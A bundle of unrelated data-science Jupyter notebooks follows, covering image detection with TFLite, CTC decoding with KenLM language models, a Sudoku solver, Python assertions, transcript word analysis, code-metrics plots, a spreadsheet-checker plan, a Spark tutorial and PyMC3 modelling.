cv2_im_rgb = cv2.resize(cv2_im_rgb, (640, 640))  # match the input size set in load_model
cv2_im = test_single_picture(cv2_im_rgb, efficientdet_lite)
cv2.imshow('frame', cv2_im)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# +
gpus = tf.config.list_physical_devices("GPU")
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
model_path = "./tflite_model_quant_D1_SGD.tflite"
efficientdet_lite = load_model(model_path)
test_image_dir_1 = "./test_pictures/ck0kepbs9kdym0848hgpcf3y9_jpeg.rf.d0a63becb54a83b6b026f4b38a42933b.jpg"
test_image_dir_2 = "./test_pictures/ck0kewsaha6hh07215jgx1bp2_jpeg.rf.1a375d20560d0de016bb524921f7b2a9.jpg"
test_image_dir_3 = "./test_pictures/ck0kfhu4n8q7f0701ixmonyig_jpeg.rf.a3cc5282520b3bac90718bdd5528bd76.jpg"
test_image_dir_4 = "./test_pictures/smoking_women.jpg"
image = test_single_picture(picture_dir=test_image_dir_1, model=efficientdet_lite)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
image = test_single_picture(picture_dir=test_image_dir_2, model=efficientdet_lite)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
image = test_single_picture(picture_dir=test_image_dir_3, model=efficientdet_lite)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
image = test_single_picture(picture_dir=test_image_dir_4, model=efficientdet_lite)
cv2.namedWindow("detect result", flags=cv2.WINDOW_NORMAL)
cv2.imshow("detect result", image)
cv2.waitKey(0)
# -
# !nvidia-smi
|
test_custom.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # CTC Language Model
# <div class="alert alert-info">
#
# This tutorial is available as an IPython notebook at [malaya-speech/example/ctc-language-model](https://github.com/huseinzol05/malaya-speech/tree/master/example/ctc-language-model).
#
# </div>
# <div class="alert alert-warning">
#
# This module is not language independent, so it is not safe to use on different languages. Pretrained models are trained on hyperlocal languages.
#
# </div>
# ### Purpose
# When doing CTC greedy / beam decoding, we want to add language bias while finding the optimum alignment.
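# As a concrete illustration, greedy CTC decoding without a language model is just: argmax per frame, collapse consecutive repeats, drop the blank. The toy vocabulary and blank index below are made up; `ctc_decoders` does all of this (plus LM scoring) internally:

```python
import numpy as np

def greedy_ctc_decode(probs, vocab, blank_index):
    """Greedy CTC: argmax each time step, collapse consecutive
    repeats, then drop the blank symbol."""
    best_path = np.argmax(probs, axis=1)
    decoded, prev = [], None
    for idx in best_path:
        if idx != prev and idx != blank_index:
            decoded.append(vocab[idx])
        prev = idx
    return "".join(decoded)

# toy 5-frame distribution over ['a', 'b', blank]
probs = np.array([
    [0.90, 0.05, 0.05],  # a
    [0.90, 0.05, 0.05],  # a (repeat -> collapsed)
    [0.05, 0.05, 0.90],  # blank (separates emissions)
    [0.90, 0.05, 0.05],  # a (new emission after the blank)
    [0.05, 0.90, 0.05],  # b
])
print(greedy_ctc_decode(probs, ['a', 'b', '_'], blank_index=2))  # -> aab
```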
# ### Install
#
# #### From PYPI
#
# ```bash
# pip3 install ctc-decoders
# ```
#
# If you use Linux: we are unable to upload Linux wheels to the PyPI repository, so download a Linux wheel from [malaya-speech/ctc-decoders](https://github.com/huseinzol05/malaya-speech/tree/master/ctc-decoders#available-whl).
# #### From source
#
# Check [malaya-speech/ctc-decoders](https://github.com/huseinzol05/malaya-speech/tree/master/ctc-decoders#from-source) for how to build from source in case there is no wheel available for your operating system.
#
# Building from source should take a few minutes.
# ### Test CTC Decoders
from ctc_decoders import ctc_greedy_decoder, ctc_beam_search_decoder
import numpy as np
import malaya_speech
# +
# https://github.com/PaddlePaddle/DeepSpeech/blob/master/decoders/tests/test_decoders.py
vocab_list = ["\'", ' ', 'a', 'b', 'c', 'd']
beam_size = 20
probs_seq1 = [[
0.06390443, 0.21124858, 0.27323887, 0.06870235, 0.0361254,
0.18184413, 0.16493624
], [
0.03309247, 0.22866108, 0.24390638, 0.09699597, 0.31895462,
0.0094893, 0.06890021
], [
0.218104, 0.19992557, 0.18245131, 0.08503348, 0.14903535,
0.08424043, 0.08120984
], [
0.12094152, 0.19162472, 0.01473646, 0.28045061, 0.24246305,
0.05206269, 0.09772094
], [
0.1333387, 0.00550838, 0.00301669, 0.21745861, 0.20803985,
0.41317442, 0.01946335
], [
0.16468227, 0.1980699, 0.1906545, 0.18963251, 0.19860937,
0.04377724, 0.01457421
]]
probs_seq2 = [[
0.08034842, 0.22671944, 0.05799633, 0.36814645, 0.11307441,
0.04468023, 0.10903471
], [
0.09742457, 0.12959763, 0.09435383, 0.21889204, 0.15113123,
0.10219457, 0.20640612
], [
0.45033529, 0.09091417, 0.15333208, 0.07939558, 0.08649316,
0.12298585, 0.01654384
], [
0.02512238, 0.22079203, 0.19664364, 0.11906379, 0.07816055,
0.22538587, 0.13483174
], [
0.17928453, 0.06065261, 0.41153005, 0.1172041, 0.11880313,
0.07113197, 0.04139363
], [
0.15882358, 0.1235788, 0.23376776, 0.20510435, 0.00279306,
0.05294827, 0.22298418
]]
greedy_result = ["ac'bdc", "b'da"]
beam_search_result = ['acdc', "b'a"]
# -
ctc_greedy_decoder(np.array(probs_seq1), vocab_list) == greedy_result[0]
ctc_greedy_decoder(np.array(probs_seq2), vocab_list) == greedy_result[1]
ctc_beam_search_decoder(probs_seq = np.array(probs_seq1),
beam_size = beam_size,
vocabulary = vocab_list)
ctc_beam_search_decoder(probs_seq = np.array(probs_seq2),
beam_size = beam_size,
vocabulary = vocab_list)
# ### List available Language Model
#
# We provided language model for our ASR CTC models,
malaya_speech.stt.available_language_model()
# ### Load Language Model
#
# ```python
# def language_model(
# model: str = 'malaya-speech',
# alpha: float = 2.5,
# beta: float = 0.3,
# **kwargs
# ):
# """
# Load KenLM language model.
#
# Parameters
# ----------
# model : str, optional (default='malaya-speech')
# Model architecture supported. Allowed values:
#
# * ``'malaya-speech'`` - Gathered from malaya-speech ASR transcript.
# * ``'local'`` - Gathered from IIUM Confession.
#
# alpha: float, optional (default=2.5)
# score = alpha * np.log(lm) + beta * np.log(word_cnt),
# increase will put more bias on lm score computed by kenlm.
# beta: float, optional (default=0.3)
# score = alpha * np.log(lm) + beta * np.log(word_cnt),
# increase will put more bias on word count.
#
# Returns
# -------
# result : Tuple[ctc_decoders.Scorer, List[str]]
# Tuple of ctc_decoders.Scorer and vocab.
# """
# ```
lm = malaya_speech.stt.language_model()
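# The `alpha`/`beta` formula in the docstring can be illustrated with a toy calculation. The probabilities below are invented; in practice the scorer applies this term inside beam search:

```python
import math

def lm_partial_score(lm_prob, word_cnt, alpha=2.5, beta=0.3):
    # per the docstring: alpha weights the KenLM probability,
    # beta weights the word count
    return alpha * math.log(lm_prob) + beta * math.log(word_cnt)

# two hypothetical 5-word hypotheses: one fluent, one gibberish
fluent = lm_partial_score(lm_prob=1e-3, word_cnt=5)
gibberish = lm_partial_score(lm_prob=1e-8, word_cnt=5)
print(fluent > gibberish)  # raising alpha favours the fluent hypothesis even more
```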
# ### Build custom Language Model
#
# 1. Build KenLM,
#
# ```bash
# wget -O - https://kheafield.com/code/kenlm.tar.gz |tar xz
# mkdir kenlm/build
# cd kenlm/build
# cmake ..
# make -j2
# ```
# 2. Prepare a newline-delimited text file. Feel free to use some from https://github.com/huseinzol05/Malay-Dataset/tree/master/dumping.
#
# ```bash
# kenlm/build/bin/lmplz --text text.txt --arpa out.arpa -o 3 --prune 0 1 1
# kenlm/build/bin/build_binary -q 8 -b 7 -a 256 trie out.arpa out.trie.klm
# ```
#
# 3. Once you have `out.trie.klm`, you can load to scorer interface.
#
# ```python
# from ctc_decoders import Scorer
#
# scorer = Scorer(alpha, beta, 'out.trie.klm', vocab_list)
# ```
|
example/ctc-language-model/ctc-language-model.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Algorithm to solve a Sudoku
# https://github.com/jorditorresBCN/Sudoku/blob/master/README.md
rows = 'ABCDEFGHI'
cols = '123456789'
def cross(A, B):
"Cross product of elements in A and elements in B."
return [a+b for a in A for b in B]
boxes = cross(rows, cols)
row_units = [cross(r, cols) for r in rows]
column_units = [cross(rows, c) for c in cols]
square_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]
unitlist = row_units + column_units + square_units
units = dict((s, [u for u in unitlist if s in u]) for s in boxes)
peers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)
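# A quick sanity check of the bookkeeping above: there are 81 boxes and 27 units, and every box belongs to exactly 3 units and has 20 peers (8 in its row, 8 in its column, 4 more in its square). Self-contained sketch:

```python
rows, cols = 'ABCDEFGHI', '123456789'
cross = lambda A, B: [a + b for a in A for b in B]
boxes = cross(rows, cols)
unitlist = ([cross(r, cols) for r in rows] +
            [cross(rows, c) for c in cols] +
            [cross(rs, cs) for rs in ('ABC', 'DEF', 'GHI')
                           for cs in ('123', '456', '789')])
units = {s: [u for u in unitlist if s in u] for s in boxes}
peers = {s: set(sum(units[s], [])) - {s} for s in boxes}

print(len(boxes), len(unitlist))            # 81 27
print(len(units['A1']), len(peers['A1']))   # 3 20
```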
def display(values):
width = 1+max(len(values[s]) for s in boxes)
line = '+'.join(['-'*(width*3)]*3)
for r in rows:
print(''.join(values[r+c].center(width)+('|' if c in '36' else '')
for c in cols))
if r in 'CF': print(line)
return
def grid_values_original(grid):
return dict(zip(boxes, grid))
def grid_values(grid):
values = []
for c in grid:
if c == '.':
values.append('123456789')
elif c in '123456789':
values.append(c)
return dict(zip(boxes, values))
example='483.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.382'
display(grid_values_original(example))
display(grid_values(example))
def eliminate(values):
"""Eliminate values from peers of each box with a single value.
"""
solved_values = [box for box in values.keys() if len(values[box]) == 1]
for box in solved_values:
digit = values[box]
for peer in peers[box]:
values[peer] = values[peer].replace(digit,'')
return values
example='483.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.382'
display(grid_values(example))
example_after_eliminate=eliminate(grid_values(example))
display(example_after_eliminate)
def only_choice(values):
for unit in unitlist:
for digit in '123456789':
dplaces = [box for box in unit if digit in values[box]]
if len(dplaces) == 1:
values[dplaces[0]] = digit
return values
display(example_after_eliminate)
example_after_only_choice=only_choice(example_after_eliminate)
print("\n\n")
display(example_after_only_choice)
def reduce_sudoku(values):
stalled = False
while not stalled:
# Check how many boxes have a determined value
solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])
# Use the Eliminate Strategy
values = eliminate(values)
# Use the Only Choice Strategy
values = only_choice(values)
# Check how many boxes have a determined value, to compare
solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])
# If no new values were added, stop the loop.
stalled = solved_values_before == solved_values_after
# Sanity check, return False if there is a box with zero available values:
if len([box for box in values.keys() if len(values[box]) == 0]):
return False
return values
example='..3.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.3..'
display(grid_values_original(example))
print("\n\n")
display(reduce_sudoku(grid_values(example)))
example='2.............62....1....7......8...3...9...7...6..4...4....8....52.............3'
display(grid_values_original(example))
display(reduce_sudoku(grid_values(example)))
def search(values):
values = reduce_sudoku(values)
if values is False:
return False ## Failed earlier
if all(len(values[s]) == 1 for s in boxes):
return values ## Solved!
# Choose one of the unfilled squares with the fewest possibilities
unfilled_squares= [(len(values[s]), s) for s in boxes if len(values[s]) > 1]
n,s = min(unfilled_squares)
# recurrence to solve each one of the resulting sudokus
for value in values[s]:
nova_sudoku = values.copy()
nova_sudoku[s] = value
attempt = search(nova_sudoku)
if attempt:
return attempt
def solve(grid):
# Create a dictionary of values from the grid
values = grid_values(grid)
return search(values)
example='2.............62....1....7......8...3...9...7...6..4...4....8....52.............3'
display(grid_values_original(example))
display(solve(example))
# +
#for creating a .py program
if __name__ == '__main__':
sudoku_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'
print ("original:")
display(grid_values_original(sudoku_grid))
print (" ")
print ("solution:")
display(solve(sudoku_grid))
|
Sudoku.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Assertions
# [Assertions](https://www.tutorialspoint.com/python/assertions_in_python.htm) help to debug and test your code. See exceptions.
# +
def divide(a, b):
assert b != 0, 'The denominator is 0!'
return a//b
divide(1, 0)
# -
try:
divide(1, 0)
except Exception as e:
print(e)
# Assertions are ignored when the interpreter runs in release (optimized) mode:
# !python -c "assert(False); print('In debug mode this is not printed')"
# !python -O -c "assert(False); print('You are running in optimized mode')"
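# Under the hood, `assert cond, msg` behaves roughly like a check guarded by the built-in `__debug__` flag, which `-O` sets to `False` (so the check disappears entirely). A sketch — the function name is illustrative:

```python
def checked_divide(a, b):
    # roughly what `assert b != 0, 'The denominator is 0!'` expands to
    if __debug__:
        if b == 0:
            raise AssertionError('The denominator is 0!')
    return a // b

print(checked_divide(10, 3))  # -> 3
print(__debug__)              # -> True under a normal (non -O) interpreter
```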
|
15-assertions.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Exploratory Data Analysis
# So far we have no idea whether all our efforts are going to be in vain; by doing the analysis here, we will know with high confidence whether the data is useful.
#
# We do this by analysing the followings:
# 1. **Most common words** - find these and create word clouds
# 2. **Size of vocabulary** - look number of unique words and also how quickly someone speaks
# 3. **Amount of profanity** - most common terms
# ## Load the cleaned data
# +
import pandas as pd
data = pd.read_csv('saves/2.cleaned_transcripts_df.csv', index_col = 0)
data
# -
# ## Vectorize the data
# +
# Imports
from sklearn.feature_extraction.text import CountVectorizer
import pandas as pd
# Vectorize
vectorizer = CountVectorizer(stop_words = 'english')
vectorized_data = vectorizer.fit_transform(data['Transcript'])
# Convert to DataFrame
vectorized_df = pd.DataFrame(vectorized_data.toarray(), columns = vectorizer.get_feature_names_out())  # get_feature_names() was removed in scikit-learn 1.2
vectorized_df.index = data.index
vectorized_df
# -
# ## Save vectorized data & the vectorizer obj
# +
import pickle
vectorized_df.to_csv('saves/3.vectorized_transcripts_df.csv')
pickle.dump(vectorizer, open("saves/3.vectorizer.pkl", "wb"))
# -
# ## Analysis
# ### Most Common Words
vectorized_df = vectorized_df.transpose()
# +
top_words = {}
for column in vectorized_df.columns:
tokens = vectorized_df[column]
tokens = tokens.sort_values(ascending = False).head(30)
top_words[column] = tokens
print(column + ':\n -', ', '.join(list(tokens.index[:15])))
# -
# #### Remove the most common words
#
# Common words seem meaningless in our analysis since everyone uses them. So they won't provide much information.
# +
top_all_words = []
for column in vectorized_df.columns:
words = list(top_words[column].index)
for word in words: top_all_words.append(word)
# +
# Imports
from collections import Counter
# Find words that are common to more than 6 of the comedians
add_stop_words = [word for word, count in Counter(top_all_words).most_common() if count > 6]
add_stop_words
# -
# #### Load the cleaned data
clean_df = pd.read_csv('saves/2.cleaned_transcripts_df.csv', index_col = 0)
clean_df
# #### Re-vectorize the clean data
# +
# Imports
from sklearn.feature_extraction import text
from sklearn.feature_extraction.text import CountVectorizer
# Update the stop words list
stop_words = text.ENGLISH_STOP_WORDS.union(add_stop_words)
vectorizer = CountVectorizer(stop_words = stop_words)
data_cv = vectorizer.fit_transform(clean_df['Transcript'])
new_vectorized_df = pd.DataFrame(data_cv.toarray(), columns = vectorizer.get_feature_names_out())  # get_feature_names() was removed in scikit-learn 1.2
new_vectorized_df.index = clean_df.index
# -
# #### Save the new vectorized data
new_vectorized_df.to_csv('saves/3.stopwords_vectorized_df.csv')
pickle.dump(vectorizer, open("saves/3.vectorizer.pkl", "wb"))
# #### Wordclouds
# +
# Imports
from wordcloud import WordCloud
wc = WordCloud(
stopwords = stop_words,
background_color = "white",
colormap = "Dark2",
max_font_size = 150,
random_state = 42
)
# +
# Imports
import matplotlib.pyplot as plt
plt.rcParams['figure.figsize'] = [16, 6]
# Create subplots for each comedian
for index, comedian in enumerate(clean_df.index):
wc.generate(clean_df['Transcript'][index])
plt.subplot(3, 4, index + 1)
plt.imshow(wc, interpolation = "bilinear")
plt.axis("off")
plt.title(comedian)
plt.show()
# -
# ### Size of vocabulary
# I decided not to do this section as it is not dynamic and requires manual data to be fed in to complete the analysis.
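# For reference, a minimal sketch of what this section could compute from a term-by-comedian count matrix like the one built above (the tiny DataFrame below is made-up illustration data; rows are words, columns are comedians):

```python
import pandas as pd

# Toy term-by-comedian matrix of word counts; in the real notebook this
# would be the transposed vectorized_df
counts = pd.DataFrame(
    {"comedian_a": [3, 0, 1], "comedian_b": [0, 2, 2]},
    index=["word1", "word2", "word3"],
)

# Vocabulary size = number of distinct words with a nonzero count
vocab_size = (counts > 0).sum()
print(vocab_size)
```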
# ### Amount of profanity
Counter(top_all_words).most_common()
# +
# Most common profanities used
profanities = ['fuck', 'shit']
profanities_df = vectorized_df.transpose()[profanities]
profanities_df
# +
for i, comedian in enumerate(profanities_df.index):
x = profanities_df['shit'].loc[comedian]
y = profanities_df['fuck'].loc[comedian]
plt.scatter(x, y, c = 'b')
plt.text(x + 0.5, y + 0.5, comedian, fontsize = 10)
plt.title('F words / S words ratio')
plt.xlabel('S words')
plt.ylabel('F words')
plt.show()
|
3.Exploratory Data Analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Getting started
# %pip install numpy pandas matplotlib seaborn
import numpy as np
import pandas as pd
import seaborn as sb
import matplotlib.pyplot as mplot
# Load Quaatlas matrix and create dataframe
quaatlas = pd.read_csv('./../data/quaatlas/matrix.csv')
# Let's check first rows of the dataframe
quaatlas.head()
# # Visualizations
# ## Size
# +
# Set size of the figure
mplot.figure(figsize=(9,5), dpi=100)
# Set title and labels
mplot.title('LOCs per Project')
mplot.xlabel('LOCs')
mplot.ylabel('Number of projects')
# Create histogram
mplot.hist(quaatlas['locs'], rwidth=0.9, bins=77)
mplot.show()
# +
# Set figure with subplots
fig, axs = mplot.subplots(ncols=3)
fig.set_size_inches(18, 5, forward=True)
fig.suptitle('LOCs Distributions', fontsize=20)
# Draw distributions (note: seaborn.distplot is deprecated since seaborn 0.11;
# sb.histplot / sb.displot are the modern replacements)
sb.distplot(quaatlas['locs'], bins=60, kde=False, rug=True, ax=axs[0])
sb.distplot(quaatlas['clocs'], bins=60, kde=False, rug=True, ax=axs[1])
sb.distplot(quaatlas['elocs'], bins=60, kde=False, rug=True, ax=axs[2])
# Set labels
axs[0].set_ylabel('# Projects')
axs[0].set_xlabel('LOCs')
axs[1].set_ylabel('# Projects')
axs[1].set_xlabel('CLOCs')
axs[2].set_ylabel('# Projects')
axs[2].set_xlabel('ELOCs')
# +
# Set figure with subplots
fig, ax = mplot.subplots()
fig.set_size_inches(10, 6, forward=True)
fig.suptitle('LOCs Boxplots', fontsize=20)
# Draw boxplots
ax = quaatlas.boxplot(column=['locs', 'clocs', 'elocs'])
mplot.xlabel("LOC types")
mplot.ylabel("Frequency")
# -
# ## Declarations
# +
# Set size of the figure
mplot.figure(figsize=(9,5), dpi=100)
# Set title and labels
mplot.title('Declarations per Project')
mplot.xlabel('Number of declarations')
mplot.ylabel('Number of projects')
# Create histogram
mplot.hist(quaatlas['declarations'], rwidth=0.9, bins=77)
mplot.show()
# +
# Set figure with subplots
fig, axs = mplot.subplots(ncols=2, nrows=2)
fig.set_size_inches(15, 10, forward=True)
fig.suptitle('Declaration Distributions', fontsize=20)
# Draw distributions
sb.distplot(quaatlas['declarations'], bins=60, kde=False, rug=True, ax=axs[0][0])
sb.distplot(quaatlas['types'], bins=60, kde=False, rug=True, ax=axs[0][1])
sb.distplot(quaatlas['methods'], bins=60, kde=False, rug=True, ax=axs[1][0])
sb.distplot(quaatlas['fields'], bins=60, kde=False, rug=True, ax=axs[1][1])
# Set labels
axs[0][0].set_ylabel('# Projects')
axs[0][0].set_xlabel('# All declarations')
axs[0][1].set_ylabel('# Projects')
axs[0][1].set_xlabel('# Types')
axs[1][0].set_ylabel('# Projects')
axs[1][0].set_xlabel('# Methods')
axs[1][1].set_ylabel('# Projects')
axs[1][1].set_xlabel('# Fields')
# +
# Set figure with subplots
fig, ax = mplot.subplots()
fig.set_size_inches(10, 6, forward=True)
fig.suptitle('Declaration Boxplots', fontsize=20)
# Draw boxplots
ax = quaatlas.boxplot(column=['declarations', 'types', 'methods', 'fields'])
mplot.xlabel("Declaration types")
mplot.ylabel("Frequency")
# -
|
stract/stract/stract_nb.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Purpose
#
# The U.S. Department of Energy's Solar Energy Technologies Office (SETO) utilizes a variety of documents for projects it funds to report on their current status. One such document is the RPPR-2 spreadsheet. This tool checks the RPPR-2 `.XLSX` file to see if it complies with SETO's template requirements file.
# # To Do List
#
# Here are the items I'm currently thinking need to be handled by this checker (updating these as I think of more):
#
# 1. Ask users to input the preceding quarter’s RPPR2 (if the award isn’t new) as well as the current RPPR2 so that we can check for cumulative updates.
# 2. Check each column AND row for any referential integrity issues:
# 1. If one column is calculated from another, check that the calculation is executing properly
# 2. Start and end dates should be earlier and later than one another, resp.
# 3. Define what columns are required in order to do even a partial data save on a given column
# 4. Check column dtypes for correctness
# 5. Check that percentages are between 0 and 1
# 3.
# # The Plan of Action
#
# 1. Import the template RPPR2
# * How to first inspect the tab names and tab count? Pandas won't do that automatically I think...
# * If you can count tabs only, return error if tab count is off, otherwise name the tabs that weren't expected as erroneous
# 2. Use the template to define:
# * What the list of proper tab names and count are
# * The size of the header above column names
# * Column names, number, and dtypes
# * For Accomplishments tab (only, I think?): Column EOL indicators so you know when you're seeing a new category
# 3. Pull in the n-1 RPPR2 (if not a new award) and the current RPPR2
# 1. Compare the two and make sure older data didn't disappear in newer RPPR2
# 2. Check the current RPPR2 for compliance with template requirements
# 3. If non-compliant, print out diagnostic report for everything obvious that you found
# * Include a line for non-equivalency that you may not have a pre-defined rule for and flag it in a separate repo file that can be referenced later for improving the code (a log file will work for this)
# * Lack of equivalency can be checked very thoroughly using `dataframe.equals(other_df)`, but it actually checks for identical elements too. Good thing to do for making sure you got two different RPPR2s, but otherwise need a more complicated check since we don't expect the same elements each time...quite the opposite in fact!
# * Might need to just check `dataframe.columns` for proper number and names of columns to start with
import pandas as pd
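# To the first question above: pandas can list a workbook's sheet names, without loading any cell data, via `pd.ExcelFile`. A sketch of the tab check (the helper names below are hypothetical):

```python
import pandas as pd

def diff_tabs(found, expected):
    """Compare sheet names: return (missing, unexpected) as sorted lists."""
    found, expected = set(found), set(expected)
    return sorted(expected - found), sorted(found - expected)

def check_workbook_tabs(path, expected_tabs):
    # pd.ExcelFile exposes .sheet_names without reading cell contents
    return diff_tabs(pd.ExcelFile(path).sheet_names, expected_tabs)
```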
|
RPPR2-Checker.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Spark: Getting Started
# * These instructions require a Mac with [Anaconda3](https://anaconda.com/) and [Homebrew](https://brew.sh/) installed.
# * Useful for small data only. For larger data, try [Databricks](https://databricks.com/).
# ## Step 0: Prerequisites & Installation
#
# Run these commands in your terminal (just once).
#
# ```bash
# # Make Homebrew aware of old versions of casks
# brew tap caskroom/versions
#
# # Install Java 1.8 (OpenJDK 8)
# brew cask install adoptopenjdk8
#
# # Install the current version of Spark
# brew install apache-spark
#
# # Install Py4J (connects PySpark to the Java Virtual Machine)
# pip install py4j
#
# # Add JAVA_HOME to .bash_profile (makes Java 1.8 your default JVM)
# # echo "\nexport JAVA_HOME=$(/usr/libexec/java_home -v 1.8)" >> ~/.bash_profile
#
# # Add SPARK_HOME to .bash_profile
# # echo "\nexport SPARK_HOME=/usr/local/Cellar/apache-spark/2.4.3/libexec" >> ~/.bash_profile
#
# # Add PySpark to PYTHONPATH in .bash_profile
# # echo "\nexport PYTHONPATH=$SPARK_HOME/python:$PYTHONPATH" >> ~/.bash_profile
#
# # Update current environment
# source ~/.bash_profile
#
# ```
# ## Step 1: Create a SparkSession with a SparkContext
import pyspark
spark = pyspark.sql.SparkSession.builder.getOrCreate()
sc = spark.sparkContext
spark
sc
# ## Step 2: Download some Amazon reviews (Toys & Games)
# +
# Download data (run this only once)
# #!wget http://snap.stanford.edu/data/amazon/productGraph/categoryFiles/reviews_Toys_and_Games_5.json.gz
# #!gunzip reviews_Toys_and_Games_5.json.gz
# -
# ## Step 3: Create a Spark DataFrame
df = spark.read.json('reviews_Toys_and_Games_5.json')
df.persist()
df.limit(5).toPandas()
df.count()
reviews_df = df[['asin', 'overall']]
def show(df, n=5):
return df.limit(n).toPandas()
show(reviews_df)
reviews_df.count()
show(reviews_df)
sorted_review_df = reviews_df.sort('overall')
show(sorted_review_df)
import pyspark.sql.functions as F
counts = reviews_df.agg(F.countDistinct('overall'))
query = """
SELECT overall, COUNT(*)
FROM reviews
GROUP BY overall
ORDER BY overall
"""
reviews_df.createOrReplaceTempView('reviews')
output = spark.sql(query)
show(output, n=1000)
reviews_df.rdd
# ### Count the words in the first row
row_one = df.first()
row_one
def word_count(text):
return len(text.split())
word_count(row_one['reviewText'])
from pyspark.sql.types import IntegerType
word_count_udf = F.udf(word_count, IntegerType())
review_text_col = df['reviewText']
counts_df = df.withColumn('wordCount', word_count_udf(review_text_col))
show(counts_df).T
# +
from pyspark.sql.types import IntegerType
word_count_udf = F.udf(word_count, IntegerType())
df.createOrReplaceTempView('reviews')
spark.udf.register('word_count', word_count_udf)
# -
query = """
SELECT asin, overall, reviewText, word_count(reviewText) AS wordCount
FROM reviews
"""
counts_df = spark.sql(query)
show(counts_df)
def count_all_the_things(text):
return [len(text), len(text.split())]
from pyspark.sql.types import ArrayType, IntegerType
count_udf = F.udf(count_all_the_things, ArrayType(IntegerType()))
counts_df = df.withColumn('counts', count_udf(df['reviewText']))
show(counts_df, 1)
slim_counts_df = (
df.drop('reviewTime')
.drop('helpful')
.withColumn('counts', count_udf(df['reviewText']))
.drop('reviewText')
)
show(slim_counts_df, n=1)
import this
|
spark.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %pylab inline
import numpy as np
import theano
import pymc3 as pm
import theano.tensor as tt
import matplotlib.pylab as plt
import scipy as sci
N = 100
X = np.random.randn(N, 1)
eps = np.random.randn(N, 1)*.3
y = X*.4 + 1.5 + eps
plt.plot(X, y, 'o');
# # Loglikelihood function via potential
# +
with pm.Model() as m0:
beta = pm.Normal('beta', 0., 10.)
a = pm.Normal('a', 0., 10.)
pm.Normal('y', X*beta+a, 1., observed=y)
with pm.Model() as m1:
beta = pm.Flat('beta')
a = pm.Flat('a')
pm.Potential('logp_beta',
pm.Normal.dist(0., 10).logp(beta))
pm.Potential('logp_a',
pm.Normal.dist(0., 10).logp(a))
pm.Potential('logp_obs',
pm.Normal.dist(X*beta+a, 1.).logp(y))
# -
m0.free_RVs
m0.potentials
m1.free_RVs
m1.potentials
m0.test_point
m1.test_point
m0.logp(m0.test_point)
m1.logp(m0.test_point)
assert m0.logp(m0.test_point) == m1.logp(m0.test_point)
logp_dlogp0 = m0.logp_dlogp_function(m0.free_RVs)
logp_dlogp0
logp_dlogp0.dict_to_array(dict(a=np.array(1.), beta=np.array(2.)))
logp_dlogp0.set_extra_values({})
logp_dlogp0(np.asarray([2., 1.]))
logp_dlogp0(np.asarray([0., 0.]))
# +
logp_dlogp1 = m1.logp_dlogp_function(m1.free_RVs)
logp_dlogp1.set_extra_values({})
logp_dlogp1(np.asarray([2., 1.]))
# -
bv = np.linspace(0., 1., 100)
av = np.linspace(1., 2., 100)
bv_, av_ = np.meshgrid(bv, av)
_, ax = plt.subplots(1, 2, figsize=(10, 5))
for i, logp_dlogp in enumerate([logp_dlogp0, logp_dlogp1]):
logvec = np.asarray([logp_dlogp(np.asarray([b, a]))[0]
for b, a in zip(bv_.flatten(), av_.flatten())])
ll = logvec.reshape(av_.shape)
ax[i].imshow(np.exp(ll), cmap='viridis');
# # Different parameterizations that produce the same logp
with pm.Model() as m0:
beta = pm.Normal('beta', 0, 10)
a = pm.Normal('a', 0, 10)
sd = pm.HalfNormal('sd', 5)
pm.Normal('y', X*beta+a, sd, observed=y)
trace0 = pm.sample()
with pm.Model() as m1:
beta = pm.Normal('beta', 0, 10)
a = pm.Normal('a', 0, 10)
sd = pm.HalfNormal('sd', 5)
pm.Normal('eps', 0, sd, observed=y - X*beta - a)
trace1 = pm.sample()
pm.traceplot(trace0);
pm.traceplot(trace1);
m1.test_point
m1.logp(m1.test_point)
m0.logp(m1.test_point)
with m0:
map0 = pm.find_MAP()
map0
with m1:
map1 = pm.find_MAP()
map1
# +
with pm.Model() as m0:
